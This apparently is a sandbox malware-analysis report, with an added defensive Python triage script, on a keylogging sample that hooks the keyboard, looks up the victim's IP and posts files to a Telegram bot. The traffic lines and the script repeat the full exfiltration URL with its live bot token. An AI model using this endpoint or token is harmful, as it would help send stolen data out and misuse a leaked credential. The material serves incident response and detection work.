Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/
Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCert
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.607404091.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.639278801.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003322000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.607404091.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.639278801.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003322000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: PSFBGrvmxy.exe, 00000000.00000003.380165357.0000000004031000.00000004.00000800.00020000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                Source: kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                Source: kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: unknownHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29b7328c749bHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.4:49696 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49697 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.4:49698 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2
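                The two HTTP requests recorded above, parsed the way a responder would parse them. This is an added example written for this report, not Joe Sandbox output and not code from the sample. The request strings are copied from the report's "HTTP traffic detected" lines, with the header separators lost in extraction (the parser tolerates that); the IP-lookup host list beyond api.ipify.org is an assumption for illustration.

```python
"""Triage the HTTP requests recorded in this report.

Added example written for this report; not Joe Sandbox output or sample code.
Given a request as the report prints it (request line and headers run
together after extraction), it recovers the headers and answers three
responder questions: is this a Telegram Bot API call and for which bot, is
the destination a public-IP lookup service, and did the client send a
User-Agent at all.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Telegram Bot API path: /bot<numeric bot id>:<secret>/<method>
_TELEGRAM_PATH = re.compile(r"/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)?")

# Hosts used to learn the victim's public IP. api.ipify.org is from the report;
# assumption: the other entries are illustrative, not an exhaustive list.
_IP_LOOKUP_HOSTS = {"api.ipify.org", "ipify.org", "icanhazip.com", "checkip.amazonaws.com"}

# Header names used to re-insert line breaks where extraction removed them.
_KNOWN_HEADERS = ("Host", "User-Agent", "Content-Type", "Content-Length", "Expect",
                  "Connection", "Accept", "Accept-Encoding", "Accept-Language",
                  "Cookie", "Authorization", "Cache-Control", "Pragma")
_GLUED_HEADER = re.compile(r"(?<!\n)(?=(?:%s): )" % "|".join(map(re.escape, _KNOWN_HEADERS)))

# Request strings copied from the report's "HTTP traffic detected" lines.
TELEGRAM_POST = (
    "POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1"
    "Content-Type: multipart/form-data; boundary=---------------------------8db29b7328c749b"
    "Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive"
)
IPIFY_GET = (
    "GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) "
    "Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive"
)


@dataclass
class HttpFinding:
    request_line: str
    host: str
    telegram_bot_id: str | None = None
    telegram_method: str | None = None
    ip_lookup: bool = False
    missing_user_agent: bool = False


def split_request(text: str) -> tuple[str, dict[str, str]]:
    """Split a request whose CRLFs were lost into (request line, lower-cased headers)."""
    text = _GLUED_HEADER.sub("\n", text)
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    headers: dict[str, str] = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def triage_request(text: str) -> HttpFinding:
    """Classify one recorded request."""
    request_line, headers = split_request(text)
    _method, _, rest = request_line.partition(" ")
    path = rest.split(" ", 1)[0]
    host = headers.get("host", "")
    finding = HttpFinding(request_line=request_line, host=host)
    match = _TELEGRAM_PATH.search(path)
    if host == "api.telegram.org" and match:
        # Record the bot id only; the secret after the colon is a live credential.
        finding.telegram_bot_id = match.group("bot_id")
        finding.telegram_method = match.group("method")
    finding.ip_lookup = host in _IP_LOOKUP_HOSTS
    finding.missing_user_agent = "user-agent" not in headers
    return finding


if __name__ == "__main__":
    for req in (TELEGRAM_POST, IPIFY_GET):
        print(triage_request(req))
```

                The bot ID (5687731944) is enough to share as an indicator; the secret after the colon is the bot's API credential and should be handled like any other leaked key rather than pasted into tickets. The sendDocument POST carries no User-Agent header, which is what the report's "HTTP GET or POST without a user agent" signature reflects, and it is a usable proxy filter since browsers and most HTTP libraries set one.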

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\PSFBGrvmxy.exe
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.390178593.0000000000F80000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Window created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Window created: window name: CLIPBRDWNDCLASS
                Source: PSFBGrvmxy.exe :: Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_02C4A9B8
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_02C4C978
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_02C49DA0
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_02C4A0E8
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_058AF4E8
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_058A9D98
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_058A19D2
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_058A19E0
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_069FB828
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_069F8270
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_069F276B
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_069FE810
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_069F3028
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Code function: 3_2_069F4940
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002E61000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.394288433.0000000003EA6000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000003.379623311.0000000005671000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenameLnyrwpx.exe" vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000003.380165357.0000000004031000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenameVusieaxlmiuiheoczvhzqqg.dll" vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.394288433.0000000003F39000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmp :: Binary or memory string: OriginalFilenameVusieaxlmiuiheoczvhzqqg.dll" vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp :: Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs PSFBGrvmxy.exe
